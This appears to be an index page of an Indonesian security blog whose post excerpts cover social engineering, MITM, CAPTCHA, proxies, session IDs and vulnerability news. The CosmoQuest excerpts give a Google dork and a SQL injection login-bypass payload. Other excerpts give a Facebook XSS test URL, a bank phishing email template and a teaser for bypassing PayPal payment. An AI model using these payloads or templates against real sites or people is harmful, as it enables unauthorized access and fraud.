Memahami Digital Signature/Tanda Tangan Digital

Masalah Authentication dan Integrity

Suatu saat, seorang teman menunjukan kepada anda sebuah file, kemudian dia mengklaim bahwa itu dibuat oleh Si X pada bulan lalu. Apa reaksi anda? Tentunya ada beragam pertanyaan yang akan muncul:

• Apa benar file itu dibuat 1 bulan yang lalu?
• Apa benar file itu dibuat oleh Si X?
• Apa benar isi file yang dilihat sekarang adalah yang ditulis Si X bulan lalu? Mungkin saja isinya sudah diubah sehingga berbeda dengan yang ditulis Si X bulan lalu.

Pertanyaan-pertanyaan itu lah yang menjadi vulnerability yang bisa saja di-exploit oleh seseorang. Dengan kata lain, vulnerability yang dimaksud adalah:

• Authentication: Siapa sebenarnya pembuat dokumen
• Integrity: Apakah dokumen itu masih asli (sama seperti pertama kali dibuat) atau sudah diubah.

Memahami Man in The Middle (MITM)

Man in the middle (mitm attack) merupakan salah satu jenis serangan yang berbahaya karena serangan ini dapat terjadi pada berbagai media informasi seperti website, handphone, dan bahkan surat. Oleh karena itu, artikel ini akan membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasinya.

Lebih Dari Sniffing

Mungkin banyak yang mengira bahwa tujuan dari dari mitm attack adalah  untuk menyadap komunikasi data rahasia, seperti sniffing. Pada dasarnya sniffing bisa disebut sebagai passive attack, karena saat sniffing attacker tidak melakukan apa-apa melainkan memantau lalu-lintas data yang lewat.

Lebih dari sniffing, pada mitm attacker dapat memantau, mencegat, bahkan mengubah data/informasi dalam komunikasi itu sehingga mitm attack dapat dikatakan sebagai active attack.

Berikut ini adalah gambaran skenario yang dapat dilakukan attacker saat melakukan mitm.

Mencuri Account Facebook Lebih Mudah Jika Dilakukan Dengan Gotong Royong

Seperti yang anda tahu, Facebook merupakan social networking yang paling "padat penduduk". Selain fasilitas, tentunya hal ini juga didukung dengan sistem keamanan yang secure. Tidak hanya menggunakan authentication berbasis password, Facebook juga menggunakan security question, nomor handphone, email secunder dan bahkan teman anda di Facebook-pun digunakan sebagai salah satu bentuk authentication.

Karena penasaran, iseng-iseng saya coba melakukan pencurian terhadap account Facebook milik saya sendiri menggunakan fasilitas yang disediakan oleh Facebook yaitu Forget Password. Berikut ini hasilnya:

Memahami Social Engineering IV

Berbeda dengan teknik hacking pada umumnya yang membutuhkan pengetahuan tentang bahasa-bahasa pemrograman tertentu, social engineering merupakan teknik hacking yang menggunakan interaksi langsung dengan manusia, memanfaatkan kelemahanya untuk mendapatkan sebanyak-banyaknya informasi penting tanpa dia, si calon korban sadari. Karenanya teknik dalam melakukan social engineering sangatlah variatif. Beberapa contohnya adalah sebagai berikut:


Memahami Social Engineering
Memahami Social Engineering II
Memahami Social Engineering III



• ketika seseorang memasukkan password di ATM atau di PC, yang bersangkutan “mengintip” dari belakang bahu sang korban, sehingga karakter passwordnya dapat terlihat,
• mengaduk-ngaduk tong sampah tempat pembuangan kertas atau dokumen kerja perusahaan untuk mendapatkan sejumlah informasi penting atau rahasia lainnya,
• menyamar menjadi “office boy” untuk dapat masuk bekerja ke dalam kantor manajemen atau pimpinan puncak perusahaan guna mencari informasi rahasia,
• ikut masuk ke dalam ruangan melalui pintu keamanan dengan cara “menguntit” individu atau mereka yang memiliki akses legal,

Memahami Social Engineering III

Beberapa hari yang lalu saya telah menuliskan tentang memahami social engineering II yang di dalamnya tedapat beberapa contoh social engineering melalui interaksi sosial sebagai salah satu jenis social engineering. Sementara itu untuk jenis kedua, yaitu menggunakan komputer atau piranti elektronik/digital lain sebagai alat bantu, cukup banyak modus operandi yang sering dipergunakan seperti:

Skenario 1 : Teknik Phishing – melalui Email

Strategi ini adalah yang paling banyak dilakukan di negara berkembang seperti Indonesia. Biasanya si penjahat menyamar sebagai pegawai atau karyawan sah yang merepresentasikan bank. Email yang dimaksud berbunyi misalnya sebagai berikut:

“Pelanggan Yth. Sehubungan sedang dilakukannya upgrade sistem teknologi informasi di bank ini, maka agar anda tetap mendapatkan pelayanan perbankan yang prima, mohon disampaikan kepada kami nomor rekening, username, dan password anda untuk kami perbaharui. Agar aman, lakukanlah dengan cara me-reply electronic mail ini. Terima kasih atas perhatian dan koordinasi anda sebagai pelanggan setia kami.

Memahami Social Engineering II

Seperti janji saya pada posting sebelumya, kali ini saya akan memberikan beberapa contoh tenik social engineering yang kerap digunakan oleh seseorang tanpa kita sadari bisa terjebak di dalamnya.

Sebelumya sudah saya tuliskan, bahwa jenis social engineering dibagi menjadi dua, yaitu melalui interaksi sosial dan melalui interaksi komputer.

Skenario 1 : Kedok sebagai User Penting

Seorang penipu menelpon help desk bagian divisi teknologi informasi dan mengatakan hal sebagai berikut “Halo, di sini pak Abraham, Direktur Keuangan. Saya mau log in tapi lupa password saya. Boleh tolong beritahu sekarang agar saya dapat segera bekerja?”.

Karena takut – dan merasa sedikit tersanjung karena untuk pertama kalinya dapat berbicara dan mendengar suara Direktur Keuangan perusahaannya – yang bersangkutan langsung memberikan password yang dimaksud tanpa rasa curiga sedikitpun.

Si penipu bisa tahu nama Direktur Keuangannya adalah Abraham karena melihat dari situs perusahaan.

Memahami Social Engineering

Sebuah kutipan dari dunia jaringan mengatakan “the strength of a chain depends on the weakest link” atau dalam bahasa Indonesia berarti "kekuatan sebuah rantai tergantung pada sambungan terlemah".

Pertanyaannya, apa/siapa the weakest link/sambungan terlemah itu dalam sistem jaringan komputer?

Jawabanya adalah manusia. Ya, manusia adalah komponen terlemah dalam suatu sistem jaringan komputer.

Walaupun sebuah sistem telah dilindungi menggunakan hardware tercanggih, software terpintar, firewall, antivirus, IDS/IPS, dan lain sebagainya - tapi jika manusia yang mengoperasikanya lalai, maka semua piranti itu tidak akan berarti. Para  pelaku cybercrime paham betul dengan hal ini, sehingga mereka mulai menggunakan teknik tertentu yang dinamakan social engineering atau yang lebih akrab disebut "soceng" yang bertujuan untuk mendapatkan informasi penting yang secara rahasia diketahui oleh manusia.

Memahami Captcha

Tentunya anda pernah, saat akan mengirim komentar/download/sign up/sign in pada suatu situs disitu terdapat kode verifikasi/captcha yang harus diisikan kedalam sebuah kolom. Menyebalkan bukan? apalagi jika kode tersebut sangat membingungkan. Memang, untuk user - captcha hanya hal sepele yang menyebalkan, tapi bagi si pemlik situs - captcha sangatlah penting, tujuanya untuk membedakan apakah user tersebut benar-benar manusia atau komputer (bot) yang hanya bermaksud melakukan hal yang merugikan bagi situs tersebut, misalnya spammer.

Banyak orang menganggap jika situsnya dijaga oleh captcha, maka spammer tidak akan bisa menembusnya. Ini salah besar, captcha memang meyulitkan, tapi bila captcha tidak dibuat dengan benar dan asal-asalan, maka spammer bisa dengan mudah menembusnya.

Bahaya Menggunakan Proxy

Tadi siang waktu nunggu jeda kuliah, saya bingung mau kemana, mau ngapain. Akhirnya bersama Ryan, saya main ke kost teman saya Si Rizal yang tempatnya persis dibelakang kampus. Sampai disana tiba-tiba Si empunya kos, Rizal, bertanya ke Ryan tentang bagaimana menggunakan proxy, kemudian Ryan menyarankanya ke sebuah situs proxy yang saya lupa namanya.

Mendengar percakapan itu saya langsung teringat dengan sebuah artikel yang pernah saya baca. Disitu di jelaskan tentang bahaya yang kita tanggung saat menggunakan proxi.

Memang benar, dengan menggunakan proxy anda dapat mengakses situs yang diblokir dan juga menjamin anonimitas. Namun hal tersebut harus anda bayar dengan mempertaruhkan keamanan informasi/data yang anda akses (resiko).

Berikut ini saya tunjukan potongan header yang terjadi saat saya mencoba login ke account Gmail saya menggunakan salah satu web proxy asal inggris.

Cara Mengetahui Komputer Laki-laki Atau Perempuan

Posting kali ini hanyalah untuk simple funny saja, dimana anda akan mengetahui apakah komputer anda laki-laki atau perempuan.

Sebenarnya trik ini sudah lama digunakan, tapi bila anda tidak mengetahuinya: apakah komputer anda laki-laki atau perempuan, silahkan downloah pada link dibawah ini:

Computer gender

Software kecil diatas dibuat dalam format .vbs dan Untuk menggunakanya anda hanya perlu mengeksekusinya lalu dengarkan apakah suara tersebut suara laki-laki atau perempuan.

Apabila yang anda dengar adalah suara laki-laki, maka komputer anda laki-laki. Sedangkan bila yang anda dengar suara perempuan, maka selamat, anda laki-laki yang beruntung (jika anda laki-laki seperti saya) karena komputer anda perempuan. :)

WordPress 3.1.1 Rilis dengan Perbaikan Vulnerability

Development team WordPress telah merilis versi 3.1.1 dari platfrom blog publishing dalam rangka mengatasi beberapa stabilitas dan isu keamanan.

Secara keseluruhan, WordPress 3.1.1 mengalami hampir tiga puluh perbaikan bug termasuk tiga vulnerability (baca: kerentanan) yang ditemukan oleh core developers: Jon Cave dan Peter Westwood.

Sebuah bug terletak pada komponen media uploader dan proteksi bypass cross-site request forgery (CSRF). Hal ini diselesaikan dengan menambahkan beberapa nonce checks pada kode.

Jenis vulnerability ini memungkinkan attacker melakukan session hijacking pada user yang sah dengan memaksa browser mereka untuk melakukan tindakan tidak sah ketika membuka sebuah link jahat yang dirancang khusus.

Profile Spy Scam Menyerang Twitter

Peneliti keamanan memperingatkan adanya sebuah scam berupa survei pada Twitter yang menjanjikan user dapat melihat pengunjung profil mereka.

Menurut Robert Graham dari Errata Security, post spam tersebut berbunyi "94 people viewed my profile today!" diikuti dengan "Wow! See who viewed your twitter with Profile Spy [link]"

Dengan meng-klik link tersebut, user akan diarahkan ke halaman yang meminta sebuah aplikasi yang disebut "Profil Spy" agar terhubung ke profil mereka.

Aplikasi ini sebenarnya digunakan untuk penipuan, dan jika di-"allow", dia akan mulai mengirim spam dari account korban tanpa meninta izin (lagi).

User yang setuju untuk terhubung dengan aplikasi tersebut akan diarahkan ke halaman yang meminta mereka untuk berpartisipasi dalam survei yang diduga untuk pemeriksaan keamanan/security check.

[Hack] Step by Step Bypass Halaman Login CosmoQuest

Menanggapi saran teman saya Hermawan Ramadhan tadi sore yang menyarankan untuk membuat posting yang "jelas" agar dapat dimengerti oleh newbie, kali ini saya akan menjelaskan bagaimana mem-bypass halaman login admin sebuah situs yang disuport oleh CosmoQuest yang saya ambil dari posting saya sebelumnya: CosmoQuest bypass login page Vulnerability.

Catatan: sebelum melangkah lebih jauh, baca dulu halaman disclaimer.

Lanjut, pertama anda harus masuk ke google untuk mencari situs target menggunakan keyword/dork: "Powered by CosmoQuest".

[Hack] CosmoQuest bypass login page Vulnerability

Title       : CosmoQuest bypass login page Vulnerability
Author    : Net.Edit0r
Vendor or Software Link  : http://www.cosmoquest.info/
Date  : 2011-03-29
Google dork : Powered by CosmoQuest
Category :  [Webapps]
Vulnerable File : AdminLogin.asp

Exploit: http://website_target/AdminLogin.asp

user: 'or''='
pass: 'or''='


XSS Vulnerability pada 1.61.channel.facebook.com

02/04/2011 - Edgard Charmmas, seorang peneliti keamanan, telah menyampaikan adanya XSS vulnerability pada Facebook (1.61.channel.facebook.com). Hal ini bertepatan dengan penyerahan website peringkat 2 menurut Alexa.

Secara manual kita dapat menguji vulnerability tersebut yang sampai hari ini (05/04/2011) masih belum juga dibenahi.

Saat mencoba membuka http://1.61.channel.facebook.com/ anda hanya akan melihat tulisan I'll find something to put here. Sedangkan anda dapat mengujinya dengan menambahkan sedikit code seperti dibawah ini:

http://1.61.channel.facebook.com/iframe/11?r=http://static.ak.fbcdn.net/rsrc.php/1.js%22%3E%3C/script%3E%3Cscript%3Ealert%28%2209.11.2655%22%29%3C/script%3E%3Cscript%3E

Memahami Session ID

Ini adalah lanjutan dari artikel saya sebelumya yang membahas tentang apa itu cookie dan bagaimana cara kerjanya. Apabila anda belum mengetahui apa itu cookie, saya sarankan untuk membacanya terlebih dahulu karena session dan cookie merupakan dua hal yang saling berhubungan.

Seperti yang kita tahu, cookie memberikan informasi user kepada server untuk kemudian disahkan oleh server. Ingat ilustrasi mahasiswa yang mengajukan beasiswa, anggap saja session id adalah stempel/tanda tangan yang diberikan khusus kepada user oleh server.

Ketika user pertama kali masuk ke sebuah situs, server akan memberikan sebuah kode unik berupa session id. Ketika server menerima request dari user yang membawa session id, server akan memeriksa apakah session id itu valid. Jika session id valid, maka server yakin bahwa request ini datang dari “returning visitor” bukan orang asing.

Memahami Authentication dan Authorization

Sebelum anda melangkah lebih jauh kedalam dunia security, ada baiknya terlebih dulu anda memahami apa itu authentication dan authorization karena semua proses security berpusat pada kedua hal itu.

Banyak orang yang masih bingung, mengira bahwa authentication sama dengan authorization, padahal keduanya sangat berbeda.

Mengutip pernyataan Mas Rizki Wicaksono dari salah satu websitenya yang menyebutkan bahwa "salah satu tujuan dari security adalah menjamin agar resource hanya boleh diakses oleh orang yang berhak dan orang yang berhak itu bisa mengakses resource tanpa halangan". Karenanya penyedia layanan membutuhkan kedua hal di atas supaya dapat memberikan layanannya kepada pengguna yang sah dengan tepat.

[Hack] Bypass Pembayaran Paypal Untuk Mendapatkan Ebook Gratis

Jika anda suka berburu ebook atau software tentunya anda penah menemukan suatu halaman download yang sangat menarik tapi untuk mendownloadnya anda diharuskan membayar lewat Paypal.

Nah, disini saya akan sharing bagaimana cara mendowload ebook tersebut tanpa harus melakukan pembayaran.

Menggunakan Google 2-Step Verification/Authentication pada Gmail

Sebenarnya sudah cukup lama saya mengetahui adanya fitur "Using 2-step verification" pada account Google, tapi baru kali ini saya coba menggunakanya.  Setelah mencoba fitur tersebut dan menggunakanya pada account saya, 2-step verification (saya lebih suka menggunakan kata "authentication") pada Gmail adalah salah satu keamanan web login terbaik dan saya sangat menyarankan untuk mengaktifkan fitur ini pada account Google anda. 

Google Menggunakan 2-Step Authentication pada Gmail

Sebelumnya banyak diskusi tentang "Multi-steped authentication", dimana gambar password dianggap sebagai salah satu bagianya. Tapi Goolge membuktikan kesalahan pada diskusi tersebut dengan mengimplementasikan code verifikasi melalui handphone sebagai tahap authentication kedua. Jadi jika hacker mengetahui password Gmail anda, dia tidak dapat login ke account Gmail anda karena fitur 2-step authentication.